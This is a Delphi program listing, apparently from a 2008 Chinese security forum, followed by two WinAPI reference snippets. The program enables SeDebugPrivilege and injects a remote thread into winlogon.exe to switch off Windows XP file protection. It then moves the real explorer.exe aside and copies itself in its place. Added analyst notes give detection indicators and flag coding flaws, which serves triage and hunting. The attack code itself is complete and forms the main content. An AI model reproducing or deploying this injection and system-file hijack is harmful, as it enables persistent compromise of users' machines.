復件 關閉xp保護替換explorer.txt
{*******************************************************}
{ }
{ 關閉XP保護。替換explorer.exe }
{ }
{ 版權所有 (C) 2008 bbs.secdst.net }
{ }
{*******************************************************}
program Project1;
uses
Windows,TlHelp32;
function LowerCase(const S: string): string; //convert to lower case
{ Returns a copy of S in which the ASCII letters 'A'..'Z' are replaced by
  'a'..'z'. Every other character is copied unchanged, so this is an
  ASCII-only fold; the program uses it for case-insensitive comparison of
  process names and file paths. }
var
  Idx: Integer;
  Cur: Char;
begin
  Result := S;
  for Idx := 1 to Length(Result) do
  begin
    Cur := Result[Idx];
    // 'A'..'Z' and 'a'..'z' are 32 code points apart.
    if (Cur >= 'A') and (Cur <= 'Z') then
      Result[Idx] := Chr(Ord(Cur) + 32);
  end;
end;
function CreatedMutexEx(MutexName: Pchar): Boolean;
{ Single-instance guard. Creates (and initially owns) the named mutex
  MutexName and returns False only when CreateMutex succeeded but the
  mutex already existed, i.e. another instance holds the same name.
  In every other case, including a failed CreateMutex, it returns True.
  The handle is never closed, so the name stays registered for the
  lifetime of the process; that makes the mutex name a stable host
  indicator for this sample. }
var
  hMutex: dword;
begin
  hMutex := CreateMutex(nil, True, MutexName);
  // GetLastError is consulted only when a handle came back, as in the original.
  if (hMutex <> 0) and (GetLastError = ERROR_ALREADY_EXISTS) then
    Result := False
  else
    Result := True;
end;
function GetWinPath: string; //get the Windows directory
{ Returns the Windows directory as reported by GetWindowsDirectory, with a
  trailing backslash appended when the API result does not already end in
  one. The API return value is not inspected. }
var
  WinDir: array[0..MAX_PATH] of char;
  Tail: Char;
begin
  GetWindowsDirectory(WinDir, MAX_PATH);
  Result := WinDir;
  Tail := Result[Length(Result)];
  if Tail <> '\' then
    Result := Result + '\';
end;
function GetTempDirectory: string; //get the temporary directory
{ Returns the temporary-files directory as reported by GetTempPath, with a
  trailing backslash appended when the API result does not already end in
  one. The API return value is not inspected. The main program visible in
  this listing does not call this helper. }
var
  TempDir: array[0..MAX_PATH] of char;
  Tail: Char;
begin
  GetTempPath(MAX_PATH, TempDir);
  Result := TempDir;
  Tail := Result[Length(Result)];
  if Tail <> '\' then
    Result := Result + '\';
end;
function EnableDebugPriv : Boolean; //enable the DEBUG privilege
// Opens the current process token and requests that SeDebugPrivilege be
// enabled on it. Returns the result of AdjustTokenPrivileges, or False when
// the privilege name cannot be looked up.
//
// Analyst note: SeDebugPrivilege is what lets a process open handles to
// system processes such as winlogon.exe. A non-debugger binary enabling it
// is a useful hunting signal; where token-right auditing is enabled it is
// recorded as a token right adjustment (Security event 4703).
var
hToken : THANDLE;
tp : TTokenPrivileges;
rl : Cardinal;
begin
result := false;
// NOTE(review): the return value of OpenProcessToken is not checked and
// hToken is never closed in this function.
OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, hToken);
if LookupPrivilegeValue(nil, 'SeDebugPrivilege', tp.Privileges[0].Luid) then
begin
tp.PrivilegeCount := 1;
tp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
// AdjustTokenPrivileges can report success while GetLastError is
// ERROR_NOT_ALL_ASSIGNED, so a True result does not by itself show that the
// token actually holds the privilege (e.g. for a non-administrator caller).
result := AdjustTokenPrivileges(hToken, False, tp, sizeof(tp), nil, rl);
end;
end;
procedure InjectThread(ProcessHandle: DWORD); //inject into winlogon.exe to turn off XP file protection
// Loads sfc_os.dll in the current process, resolves the export with
// ordinal 2, unloads the library, then starts a thread at that address in
// the process identified by ProcessHandle and waits up to 4000 ms for it.
// Per the author's comment the purpose is to switch off Windows File
// Protection (WFP) on Windows XP so that replaced system files are not
// restored.
//
// Analyst notes:
// - No return value is checked, and hThread (declared as HMODULE) is never
//   closed.
// - WFP is the XP-era mechanism; later Windows versions protect system files
//   with Windows Resource Protection instead, so this listing targets XP.
// - Detection: a remote thread created in winlogon.exe by an unrelated
//   process is a high-signal event (Sysmon Event ID 8, CreateRemoteThread),
//   as is a user-mode program loading sfc_os.dll and resolving an export by
//   ordinal. After such an event, verify protected system files against
//   known-good hashes or signatures.
var
TID: LongWord;
hSfc,hThread: HMODULE;
pfnCloseEvents: Pointer;
begin
hSfc := LoadLibrary('sfc_os.dll');
pfnCloseEvents := GetProcAddress(hSfc,MAKEINTRESOURCE(2));
FreeLibrary(hSfc);
hThread := CreateRemoteThread(ProcessHandle, nil, 0, pfnCloseEvents, nil, 0, TID);
WaitForSingleObject(hThread, 4000);
end;
procedure InitProcess(Name: string); //find the PID of the winlogon.exe process
// Walks a Toolhelp process snapshot and, for the first process whose
// lower-cased executable name equals Name, opens it with PROCESS_ALL_ACCESS,
// passes the handle to InjectThread, closes it and stops searching.
// Only the snapshot entry is lower-cased, so Name must already be lower case
// for the comparison to match.
//
// Analyst notes:
// - Neither the snapshot handle nor the OpenProcess result is checked before
//   use.
// - Detection: an OpenProcess call requesting PROCESS_ALL_ACCESS on
//   winlogon.exe from a user-launched binary is rarely legitimate
//   (Sysmon Event ID 10, ProcessAccess, with the target image and granted
//   access mask).
var
FSnapshotHandle: THandle;
FProcessEntry32: TProcessEntry32;
ProcessHandle:dword;
begin
FSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
FProcessEntry32.dwSize:=Sizeof(FProcessEntry32);
if Process32First(FSnapshotHandle,FProcessEntry32) then begin
repeat
If Name = LowerCase(FProcessEntry32.szExeFile) then
begin
ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, FProcessEntry32.th32ProcessID);
InjectThread(ProcessHandle);
CloseHandle(ProcessHandle);
Break;
end;
until not Process32Next(FSnapshotHandle,FProcessEntry32);
end;
CloseHandle(FSnapshotHandle);
end;
// Program body. Sequence as written: take a single-instance mutex, enable
// SeDebugPrivilege, run the winlogon.exe step that the author describes as
// disabling XP file protection, then move the existing
// <windir>\explorer.exe to <windir>\system32\explorer.exe, copy this
// executable over <windir>\explorer.exe and launch the moved original.
//
// Host indicators visible in this listing (for triage and hunting):
// - a named mutex 'OpenSoul';
// - an explorer.exe present under <windir>\system32\ (the file the program
//   moves there itself);
// - <windir>\explorer.exe whose hash or signature no longer matches the
//   vendor-shipped binary.
// Remediation should restore explorer.exe from trusted media rather than
// from the moved copy, and confirm that file protection is functioning again.
const ExpFile = 'explorer.exe';
MasterMutex = 'OpenSoul';
var
s: string;
begin
if not CreatedMutexEx(MasterMutex) then ExitProcess(0); //mutex: exit if another instance already holds it
if not EnableDebugPriv then Exit; //exit if the privilege request fails
InitProcess('winlogon.exe') ; //inject into winlogon.exe: turn off XP file protection first, so the system does not restore the file
s := ParamStr(0) ; //full path and name of the current program
if LowerCase(s) <> LowerCase(GetWinPath + ExpFile) then //check whether this program is the explorer.exe in the Windows directory
// NOTE(review): as written, the `if` above governs only this showmessage
// call; the begin..end block that follows is a separate statement and runs
// unconditionally. showmessage is also not provided by the units named in
// the uses clause (Windows, TlHelp32), so the listing may not compile as
// posted.
showmessage('目前的explorer.exe不是自己');
begin //if it is not
MoveFileEx(PChar(GetWinPath + ExpFile),PChar(GetWinPath + 'system32\explorer.exe'),MOVEFILE_REPLACE_EXISTING); //first move the running explorer.exe
CopyFile(PChar(S),PChar(GetWinPath+ ExpFile),false) ; //copy this program into the Windows directory as explorer.exe
end;
WinExec(PChar(GetWinPath + 'system32\explorer.exe'),1); //run the real explorer.exe
end.
WinAPI: GetWindowsDirectory - 獲取 Windows 所在目錄
//Declaration:
GetWindowsDirectory(
lpBuffer: PChar; {buffer that receives the path}
uSize: UINT {buffer size}
): UINT; {returns the actual length; 0 indicates failure, and a value larger than uSize means the buffer was too small}
--------------------------------------------------------------------------------
//Example:
// Reads the Windows directory into a MAX_PATH+1 character buffer and shows
// the path and the returned length. The return value is displayed but not
// checked; production code should treat 0 as failure before using arr.
var
arr: array[0..MAX_PATH] of Char;
num: UINT;
begin
num := GetWindowsDirectory(arr, MAX_PATH);
ShowMessage(arr); {C:\WINDOWS}
ShowMessage(IntToStr(num)); {10}
end;
WinAPI: GetTempPath - 獲取臨時文件夾路徑
//Declaration:
GetTempPath(
nBufferLength: DWORD; {buffer size}
lpBuffer: PChar {buffer that receives the path}
): DWORD; {returns the actual length; 0 indicates failure, and a value larger than nBufferLength means the buffer was too small}
--------------------------------------------------------------------------------
//Example:
// Reads the temporary-files directory into a MAX_PATH+1 character buffer and
// shows the path and the returned length. The return value is displayed but
// not checked; production code should treat 0 as failure before using arr.
// NOTE(review): the temp path is typically derived from per-user environment
// settings, so it should not be treated as a trusted location.
var
arr: array[0..MAX_PATH] of Char;
num: DWORD;
begin
num := GetTempPath(MAX_PATH, arr);
ShowMessage(arr); {C:\DOCUME~1\wy\LOCALS~1\Temp\}
ShowMessage(IntToStr(num)); {29}
end;